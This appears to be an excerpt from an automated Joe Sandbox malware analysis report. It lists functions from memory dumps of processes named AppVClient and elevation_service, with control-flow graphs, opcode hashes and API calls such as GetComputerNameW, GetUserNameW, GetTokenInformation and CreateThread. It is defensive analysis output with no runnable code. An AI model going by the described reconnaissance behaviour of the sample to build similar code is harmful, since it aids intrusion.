                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 6b9d08aa84109981c3e6b90c98c6ae274f52a1c635a133ab8b828730c699a4cf
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: EAC04C6163DF4696567906491C1B0FC3B509602795F5C0446BC2681324DD558F4B51DB
                                        Function 00C3817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 627 c3817f 628 c38184 627->628 629 c38186 CloseHandle 628->629 630 c3818c-c38192 628->630 629->630 631 c38115-c38118 630->631 632 c38194 630->632 634 c380a7 631->634 635 c38119-c3811a 631->635 632->631 633 c3819a 632->633 636 c3813c 633->636 635->634 637 c3811c 635->637 636->628 638 c3820f 637->638 639 c38215-c3821e 638->639 640 c3808e-c38096 638->640 639->640 642 c38224 639->642 640->628 640->634 643 c381d7-c381e6 call c6715c 642->643 644 c38226 642->644 653 c380ca-c3810f GetTokenInformation 643->653 654 c38089 643->654 644->643 645 c38228-c382ee call c35d90 644->645 657 c382f0 645->657 658 c3830c-c3831e 645->658 662 c38111 653->662 663 c3812d 653->663 654->653 656 c3808b 654->656 666 c3808c 656->666 657->658 664 c382f2 657->664 660 c382a1-c382ba call c35d90 call c3ec00 658->660 661 c38320 658->661 660->661 667 c38322 661->667 668 c382f7-c382fc call c35d90 661->668 662->663 669 c38113 662->669 670 c38133 663->670 671 c380a8 663->671 664->668 666->640 667->668 674 c38324-c38326 667->674 689 c38253-c38265 call c51280 668->689 690 c38302 668->690 669->631 670->636 672 c381ed-c381f0 670->672 675 c380aa-c380ad 671->675 678 c381f6 672->678 679 c380da-c380f1 672->679 680 c38328 674->680 681 c38163-c38170 call c67164 675->681 682 c380b3-c38203 675->682 678->679 686 c381fc 678->686 679->675 692 c38335 680->692 693 c382df-c3832b 680->693 681->629 700 c38172 681->700 682->681 698 c38209 682->698 696 c381fe-c38201 GetTokenInformation 686->696 689->680 706 c3826b 689->706 690->689 697 c38308-c3830a 690->697 703 c3826e-c38285 692->703 693->692 705 c3832d-c38331 693->705 696->638 710 c381b7 696->710 697->658 700->630 708 c38287 703->708 709 c3829b-c3829d 703->709 705->692 706->703 711 c38239 706->711 712 c3824c 708->712 709->660 710->638 713 c381b9-c381ca 710->713 711->680 714 c3823f-c38243 711->714 712->709 715 c3824e-c38252 712->715 718 c380f3 713->718 719 c381d0 713->719 714->668 714->712 715->703 718->666 720 c380f5 718->720 719->696 725 c380c3 719->725 720->666 724 c38077 720->724 724->643 725->696 726 c380c9 725->726 726->653
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: c1f1eec48696f2b4868630efcacf8d4ca668e1beedda0ecb8e2f06eca5c9b43c
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 97C092A0678B0987513826892C0A0BD3AA04613BA0F0D4512FD268A368DD984F4B42E2

                                        Non-executed Functions

                                        Function 00C62D40 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: _clrfp
                                        • String ID:
                                        • API String ID: 3618594692-0
                                        • Opcode ID: b2614b7e1b0189ae345bd4c1d95b1b808051b71dd771fb59e21b33d23e549fbc
                                        • Instruction ID: b7b08fd7b72afc30a09e93b0796eb3bdf37f29d66915edc4b6421a6a6c5c6244
                                        • Opcode Fuzzy Hash: b2614b7e1b0189ae345bd4c1d95b1b808051b71dd771fb59e21b33d23e549fbc
                                        • Instruction Fuzzy Hash: B4B16A31610A5D8FDBA9CF1CC8CAB6677E0FF59304F198599E86ACB262C335D952CB01
                                        Function 00C5EEB0 Relevance: .7, Instructions: 737COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33f1da026cedb8bb4c154c58f95936b4a0e13185094ee08358de1f6eed02a0cf
                                        • Instruction ID: aced9e1f394c2d1740a3408650b3d1d5d186c70fa47c36cfecad040983deca44
                                        • Opcode Fuzzy Hash: 33f1da026cedb8bb4c154c58f95936b4a0e13185094ee08358de1f6eed02a0cf
                                        • Instruction Fuzzy Hash: 03F1A732668F1C079728EE9DAC8E2B573C2D3E8722F4A437F9805D3265DD75AC8185C2
                                        Function 00C37C00 Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 724192d415810ac4f34237431d09bd2ecc20d27c57fa4998346b62a5e3d6f42c
                                        • Instruction ID: 0f55d5a71881dfc16bbb5d5e56a918e39c0ed1c96015c9df648268c5cea446fe
                                        • Opcode Fuzzy Hash: 724192d415810ac4f34237431d09bd2ecc20d27c57fa4998346b62a5e3d6f42c
                                        • Instruction Fuzzy Hash: 5DC14A3242DB684ED32B9F7D98812E6F3E4FFD9319F41872AD9C5A3060DB3855478286
                                        Function 00C5A810 Relevance: .3, Instructions: 257COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e6b58e5a89bf5cdf24951cf629520558a61642b70cf246aec3f524e75493717
                                        • Instruction ID: 81878882f838a7c71bfcd71a9427000161ba3efb37b033e1f2411dee7fd754be
                                        • Opcode Fuzzy Hash: 4e6b58e5a89bf5cdf24951cf629520558a61642b70cf246aec3f524e75493717
                                        • Instruction Fuzzy Hash: 6061E531A293894B930DC91D9C864517B92EAA651937CC3ECCDD28F387E862F517C3D2
                                        Function 00C379F0 Relevance: .2, Instructions: 200COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1f5d48277bc0f55615c85d5447f4aabc13901e765d7b4c94bbb2eede31096fc
                                        • Instruction ID: c00cc17ca08ed3c2e61101c402762fd99a63628e00dbfe91416c52aa389cc81a
                                        • Opcode Fuzzy Hash: a1f5d48277bc0f55615c85d5447f4aabc13901e765d7b4c94bbb2eede31096fc
                                        • Instruction Fuzzy Hash: B65171D0A3C7848BDB794B2E085427EBAB1EB95328F1D63DBE06AC2291D9244F41B355
                                        Function 00C593B0 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1cb0376d5f4543bb8137eeff6a4ca7b4a3039c8d8bd8826e253d9a000427cd9
                                        • Instruction ID: dd5ab14a278209c2a8eb9a9065036ab52eaa82f327a7141319c9eec701cba398
                                        • Opcode Fuzzy Hash: f1cb0376d5f4543bb8137eeff6a4ca7b4a3039c8d8bd8826e253d9a000427cd9
                                        • Instruction Fuzzy Hash: 53510DB28183058F8308CF19C882126FBE5FB8A714B15855EE9D697212D731F9538FC2
                                        Function 00C592A0 Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0710a6d56e74f75e4f2d76c0792897e09a389baafeaf9ef38ca3dee3c678baf7
                                        • Instruction ID: 95f53bcb3013ffc607570205fa4a55d7e593650cec09bf4caffca84637faaae4
                                        • Opcode Fuzzy Hash: 0710a6d56e74f75e4f2d76c0792897e09a389baafeaf9ef38ca3dee3c678baf7
                                        • Instruction Fuzzy Hash: C84182B69683048F830CDF14C883422B7E4FB8A719B25C56DD9D64B202DB31F953DAC2

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:98%
                                        Signature Coverage:0%
                                        Total number of Nodes:98
                                        Total number of Limit Nodes:10
                                        execution_graph 5722 9981b1 5723 998075 5722->5723 5724 998186 CloseHandle 5723->5724 5725 9981ad GetTokenInformation 5723->5725 5726 9980ca GetTokenInformation 5723->5726 5727 9980a7 5723->5727 5724->5723 5725->5723 5726->5723 5782 998090 5785 998075 5782->5785 5783 998186 CloseHandle 5783->5785 5784 9980ca GetTokenInformation 5784->5785 5785->5783 5785->5784 5786 9980a7 5785->5786 5787 9981ad GetTokenInformation 5785->5787 5787->5785 5808 9957f0 5811 9955ac 5808->5811 5809 9955e9 5811->5808 5811->5809 5812 9b3870 5811->5812 5813 9b3876 5812->5813 5815 9b3893 5813->5815 5816 9b3720 5813->5816 5815->5811 5818 9a0c42 5816->5818 5817 99e050 VirtualAlloc 5817->5818 5818->5816 5818->5817 5819 9b37dd 5818->5819 5819->5815 5793 9952f4 5796 9952cb 5793->5796 5794 9953c4 GetSystemDefaultLangID 5795 9952b0 5794->5795 5796->5794 5796->5795 5788 9952b7 5789 9952b0 5788->5789 5791 9952c4 5788->5791 5790 9953c4 GetSystemDefaultLangID 5792 995475 5790->5792 5791->5789 5791->5790 5828 995b09 5829 995b16 5828->5829 5830 995cdf CreateThread 5829->5830 5831 995c01 5829->5831 5830->5829 5830->5831 5832 9954a0 5830->5832 5831->5831 5820 9955ef 5821 9955ac 5820->5821 5822 9b3870 VirtualAlloc 5821->5822 5823 9955e9 5821->5823 5822->5821 5728 995b00 5729 995bba 5728->5729 5736 9a52c0 5729->5736 5731 995bc7 5735 995bde 5731->5735 5741 9b0080 5731->5741 5737 9a52c6 5736->5737 5740 9a52ce 5736->5740 5737->5740 5755 99e050 5737->5755 5740->5731 5747 9b0089 5741->5747 5742 9b03e0 GetComputerNameW 5742->5747 5743 9b0181 VirtualFree 5743->5747 5744 99e050 VirtualAlloc 5744->5747 5745 9b03bf GetUserNameW 5745->5747 5746 9b04d6 GetComputerNameW 5746->5747 5747->5742 5747->5743 5747->5744 5747->5745 5747->5746 5748 995c7b 5747->5748 5749 998070 5748->5749 5751 998075 5749->5751 5750 998186 CloseHandle 5750->5751 5751->5750 5752 9981ad GetTokenInformation 5751->5752 5753 9980ca GetTokenInformation 5751->5753 5754 9980a7 5751->5754 5752->5751 5753->5751 5754->5735 5756 99e0c3 5755->5756 5757 99e0d8 VirtualAlloc 5756->5757 5757->5756 5797 995860 5798 9a52c0 VirtualAlloc 5797->5798 5799 995869 5798->5799 5800 9b0080 5 API calls 5799->5800 5801 99587d 5800->5801 5802 998070 3 API calls 5801->5802 5803 995870 5802->5803 5758 995b42 5759 995b07 5758->5759 5759->5758 5761 995b68 5759->5761 5763 995bb4 5759->5763 5764 9952a0 5759->5764 5762 995cdf CreateThread 5762->5761 5762->5763 5768 9954a0 5762->5768 5763->5761 5763->5762 5767 9952ab 5764->5767 5765 9953c4 GetSystemDefaultLangID 5766 9952b0 5765->5766 5766->5759 5767->5765 5767->5766 5769 9954b5 5768->5769 5824 9955e4 5826 9955ac 5824->5826 5825 9b3870 VirtualAlloc 5825->5826 5826->5824 5826->5825 5827 9955e9 5826->5827 5775 995b87 CreateThread 5777 995b1c 5775->5777 5779 995810 5775->5779 5776 995cdf CreateThread 5776->5777 5778 995c01 5776->5778 5781 9954a0 5776->5781 5777->5776 5777->5778 5780 995822 5779->5780 5843 995347 5846 9952cb 5843->5846 5844 9953c4 GetSystemDefaultLangID 5845 995475 5844->5845 5846->5844 5847 9952b0 5846->5847

                                        Executed Functions

                                        Function 009952A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 290 9952a0-9953fe 295 9d0d4c-9d0d4e 290->295 296 995400-995424 290->296 298 99539b 296->298 299 99542a 296->299 300 99539d-9953a1 298->300 301 995413-995419 298->301 299->298 302 995430-99543e 299->302 303 9952b0-9952b5 300->303 304 9953a7 300->304 305 995441-99544a 302->305 304->303 306 9953ad 304->306 310 995450 305->310 311 9953c4-9953ca GetSystemDefaultLangID 305->311 308 9953af 306->308 309 9953f3-9953f9 306->309 312 9953e0-9953f1 308->312 320 99532a 309->320 321 995355 309->321 318 995411 310->318 319 9953c1 310->319 314 995475-99547b 311->314 312->301 312->309 314->295 318->301 318->311 319->318 322 9953c3 319->322 320->321 324 99532c-99533f 320->324 325 9952e8-995363 321->325 326 9952d1-9952e7 321->326 327 99536b-99536f 324->327 332 9953d1-9953d5 325->332 333 995365 325->333 326->325 327->305 328 995375-995390 327->328 328->322 334 995392-99539a 328->334 332->300 335 9953d7 332->335 333->332 336 995367-995369 333->336 334->300 335->312 337 995342-995345 335->337 336->327 337->296 338 99534b 337->338 338->296 339 995351-995353 338->339 339->321
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 009953C4
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 7e1f51885664d4502edf64c1499c77b036275aacca76b39c856f677499d9dcd5
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: A241E55140DE95CFDF27432C48662777BA89B223E2F9F08D7D496CA0F2E19C4C819726
                                        Function 009B0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 9b0080-9b0286 2 9b0099-9b0575 0->2 3 9b028c 0->3 7 9b057b 2->7 8 9b0155 2->8 5 9b0445 3->5 5->2 6 9b044b-9b0457 5->6 9 9b0458-9b0472 GetComputerNameW 6->9 7->8 10 9b0581-9b0587 7->10 11 9b02ef-9b0495 call 99e050 * 2 8->11 15 9b03ee-9b03f4 9->15 16 9b024c-9b0253 9->16 13 9b058b 10->13 11->9 50 9b043e 11->50 18 9b058c-9b0591 13->18 19 9b0181 VirtualFree 13->19 37 9b00da-9b023f 15->37 38 9b03fa 15->38 23 9b01e6 16->23 24 9b0255 16->24 21 9b04ab-9b04af 18->21 22 9b0597 18->22 20 9b01a8-9b02ac call 9c7164 19->20 28 9b02b1-9b02be 20->28 48 9b04c7 21->48 22->21 30 9b059d 22->30 27 9b01ec-9b0313 call 9c715c 23->27 23->28 31 9b02d3 24->31 53 9b0318-9b031e 27->53 33 9b03bf-9b03d9 GetUserNameW 28->33 34 9b02c4 28->34 30->21 31->23 36 9b02d9 31->36 43 9b0331 33->43 34->33 44 9b02ca 34->44 36->11 37->16 51 9b0241-9b024a 37->51 38->37 45 9b0400 38->45 54 9b0171 43->54 55 9b0337 43->55 44->31 52 9bb1ee-9bb49f 45->52 59 9b04cc-9b04e6 call 9c9970 GetComputerNameW 48->59 50->5 51->16 51->28 57 9b0568-9b056b 53->57 58 9b0324 53->58 60 9b013f-9b0146 54->60 61 9b0173 54->61 55->54 56 9b033d 55->56 63 9b05d0-9b05d9 56->63 57->59 58->57 65 9b032a 58->65 70 9b04ec-9b0514 59->70 71 9b0131 59->71 60->13 62 9b0230 61->62 62->48 67 9b0236-9b05c2 62->67 63->52 65->43 67->48 74 9b05c8-9b05c9 67->74 70->57 72 9b0089-9b008c 71->72 73 9b0137 71->73 72->20 76 9b0092 72->76 73->72 77 9b013d 73->77 74->63 76->20 78 9b0098 76->78 77->19 77->60 78->2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 318193acf0547fbb5b573026f16a91d4196d427215b1f93992e386db591f7248
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 1AD1E43151CB0D8BC728EF58D94A7EBB7D5FBE0320F184A1ED846C7164DA789A458AC2
                                        Function 00998070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 998070-99817e 81 99813d-9981a5 79->81 82 998180 79->82 97 9981bd-9981ca 81->97 98 9981a7 81->98 83 99815f 82->83 84 998184 82->84 83->81 88 998161 83->88 85 99818c-998192 84->85 86 998186 CloseHandle 84->86 89 998115-998118 85->89 90 998194 85->90 86->85 92 998163-998170 call 9c7164 88->92 94 998119-99811a 89->94 95 9980a7 89->95 90->89 96 99819a 90->96 92->86 102 998172 92->102 94->95 100 99811c 94->100 101 99813c 96->101 107 9981d0 97->107 108 9980f3 97->108 103 99820f 100->103 101->84 102->85 105 99808e-998096 103->105 106 998215-99821e 103->106 105->84 105->95 106->105 118 998224 106->118 115 9981fe-998201 GetTokenInformation 107->115 116 9980c3 107->116 110 99808c 108->110 111 9980f5 108->111 110->105 111->110 117 998077 111->117 115->103 130 9981b7 115->130 116->115 120 9980c9 116->120 121 9981d7-9981de call 9c715c 117->121 118->121 122 998226 118->122 126 9980ca-9980d8 GetTokenInformation 120->126 128 9981e3-9981e6 121->128 122->121 123 998228-9982ee call 995d90 122->123 145 99830c-99831e 123->145 146 9982f0 123->146 129 99810f 126->129 128->126 144 998089 128->144 131 99812d 129->131 132 998111 129->132 130->103 135 9981b9-9981bb 130->135 139 9980a8 131->139 140 998133 131->140 132->131 137 998113 132->137 135->97 137->89 142 9980aa-9980ad 139->142 140->101 143 9981ed-9981f0 140->143 142->92 147 9980b3-998203 142->147 148 9980da-9980f1 143->148 149 9981f6 143->149 144->126 150 99808b 144->150 154 9982a1-9982ba call 995d90 call 99ec00 145->154 155 998320 145->155 146->145 151 9982f2 146->151 147->92 158 998209 147->158 148->142 149->148 153 9981fc 149->153 150->110 157 9982f7-9982fc call 995d90 151->157 153->115 154->155 155->157 159 998322 155->159 169 998253-998265 call 9b1280 157->169 170 998302 157->170 159->157 163 998324-998326 159->163 166 998328 163->166 173 9982df-99832b 166->173 174 998335 166->174 169->166 179 99826b 169->179 170->169 175 998308-99830a 170->175 173->174 180 99832d-998331 173->180 178 99826e-998285 174->178 175->145 181 99829b-99829d 178->181 182 998287 178->182 179->178 184 998239 179->184 180->174 181->154 183 99824c 182->183 183->181 186 99824e-998252 183->186 184->166 185 99823f-998243 184->185 185->157 185->183 186->178
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 0a4014a1951fa1c364b71e9d3b7041d8048a6752aa969b61b9256ea71c967e7e
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 9F61433060CA459FDF758B2C881877B7BA8FB57390F680A5EE45BC31A0DF288C468352
                                        Function 00995910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 995910-995912 188 995950-995968 187->188 189 995915-995928 call 9c9970 187->189 188->189 190 99596a 188->190 196 9959b8 call 9b0df0 189->196 192 99592f 190->192 193 995970-99597b 190->193 192->189 195 995931-9a072c 192->195 197 99597d 193->197 198 9959d4 193->198 207 9a0732-9a0738 195->207 208 9a0806-9a0809 195->208 205 9959bd-9959c2 call 995d90 196->205 197->198 199 99597f-995981 197->199 202 9959d8-9959de 198->202 203 99593b-995a15 call 9b11a0 198->203 204 995983-995a38 199->204 217 9959e0 202->217 218 995994-99599c 202->218 204->218 219 995a3e 204->219 220 9959c7-9959ce 205->220 214 9a073e 207->214 215 9a0800 207->215 223 9a079d-9a07a6 208->223 214->215 216 9a0744-9a0774 214->216 215->208 222 9a06b3-9a06b7 215->222 236 9a077a-9a081c 216->236 237 9a06d5-9a06d9 216->237 217->218 233 9959e2-9959ec 217->233 225 99599e-9959f7 218->225 226 995a02 218->226 230 995a2c-995a34 219->230 231 995a1a-995a26 220->231 232 9959d0 220->232 222->223 227 9a06bd 222->227 228 9a07a8 223->228 229 9a0791-9a0793 223->229 225->226 226->193 227->223 239 9a06c3-9a07fe 227->239 228->229 242 9a07aa 228->242 240 9a07ca-9a07cc 229->240 241 9959d9-9959de call 9c2190 230->241 231->230 244 9959a1-9959b5 call 995e10 231->244 232->231 243 9959d2 232->243 234 9959ee-9959ef 233->234 235 995a62-995a6e 233->235 234->204 245 9959f1 234->245 252 995a70 235->252 253 995a75-995ab3 call 9b1280 235->253 236->223 249 9a06db 237->249 250 9a06df 237->250 239->215 241->217 241->218 242->240 243->241 244->196 261 995a08-995a0b 244->261 245->189 249->250 256 9a06dd 249->256 250->223 252->253 259 995a72 252->259 277 995abb-995ac9 253->277 278 995ab5 253->278 256->250 262 9ac0cc 256->262 259->253 261->218 263 995a0d 261->263 264 9ac0e8-9ac102 262->264 265 9ac0ce-9ac0d0 262->265 273 995991 263->273 274 995932 263->274 267 9ac0d2-9ac0df 264->267 268 9ac104 264->268 265->267 276 9ac0e7 267->276 268->267 268->276 273->274 275 995993 273->275 275->218 279 995af2-995af5 277->279 278->277 280 995ab7-995ab9 278->280 284 995adb-995adc 279->284 285 995ad5 279->285 280->277 286 995ae2 284->286 287 995a45-995a46 284->287 285->284 288 995ad7-995ad9 285->288 286->287 289 995ae8 286->289 288->284 289->279
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 8fceb520db467d50f50b7a6d392188be37ef6567eaa8d8ed10de84621d20dec2
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: CAF1282171CE488FDB6A971C59513FA73D2F7DA320F99459EE04FC3296DD289C468382
                                        Function 00995B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 340 995b42-995b47 call 995d90 342 995b4c-995b52 340->342 344 995b0d 342->344 345 995c42-995c62 call 9b1280 342->345 344->345 346 995b13 344->346 356 995c68 345->356 357 995c24 345->357 348 995c8f-995c96 346->348 350 995c29 348->350 351 995c98-995c9a 348->351 354 995c2f-995c36 350->354 355 995cc2-995cc9 call 9952a0 350->355 353 995c9c 351->353 361 995bfa 353->361 362 995d0e-995d18 353->362 354->355 360 995c3c 354->360 372 995c69 355->372 373 995ccb 355->373 363 995c14-995c19 357->363 364 995c26 357->364 360->340 361->362 366 995c00 361->366 367 995d1a 362->367 368 995d54 362->368 369 995cc0 363->369 370 995c20-995c21 363->370 364->363 371 995c28 364->371 366->363 376 995d4b-995d52 367->376 369->355 370->356 371->350 374 995b68-995d75 372->374 375 995c6f 372->375 373->353 377 995ccd 373->377 375->374 379 995c75 375->379 376->368 380 995d45-995d47 376->380 377->353 381 995ccf-995cdd 377->381 379->348 383 995d49 380->383 384 995d5f 380->384 382 995cdf-995ce4 CreateThread 381->382 385 995cea 382->385 386 995c01-995d41 382->386 383->376 383->384 389 995d65 384->389 385->386 387 995cf0-995cf6 385->387 386->376 397 995d43 386->397 387->370 390 995cff-995d01 387->390 389->389 391 995bb4 390->391 392 995d07 390->392 394 995cda-995cdd 391->394 392->391 395 995d0d 392->395 394->382 397->368
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 73e7bccd0938c447e1933088e2ec6cb52898ce5f2e8c7f0ebe3bee80ff00ba16
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 8E21B23020CF458FDF6B9B2C845877766E9AB59311F5B09A68087CF2D6EA28CC44D356
                                        Function 00995B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 995b09-995b3b 402 995cff-995d01 398->402 403 995bb4-995ce4 CreateThread 402->403 404 995d07 402->404 408 995cea 403->408 409 995c01-995d41 403->409 404->403 406 995d0d 404->406 408->409 410 995cf0-995cf6 408->410 416 995d4b-995d52 409->416 417 995d43 409->417 410->402 412 995c20-995c68 410->412 418 995d54 416->418 419 995d45-995d47 416->419 417->418 420 995d49 419->420 421 995d5f 419->421 420->416 420->421 422 995d65 421->422 422->422
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: b1c092ac289358fcd98f21ad272b8a8429bc7eb2b7edbf372381929755e1c95a
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: 6A01927010DF468FDF67572C9C1837B77D4AB55324F2B09ABC4C7CA0D5EA684905A712
                                        Function 00995B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
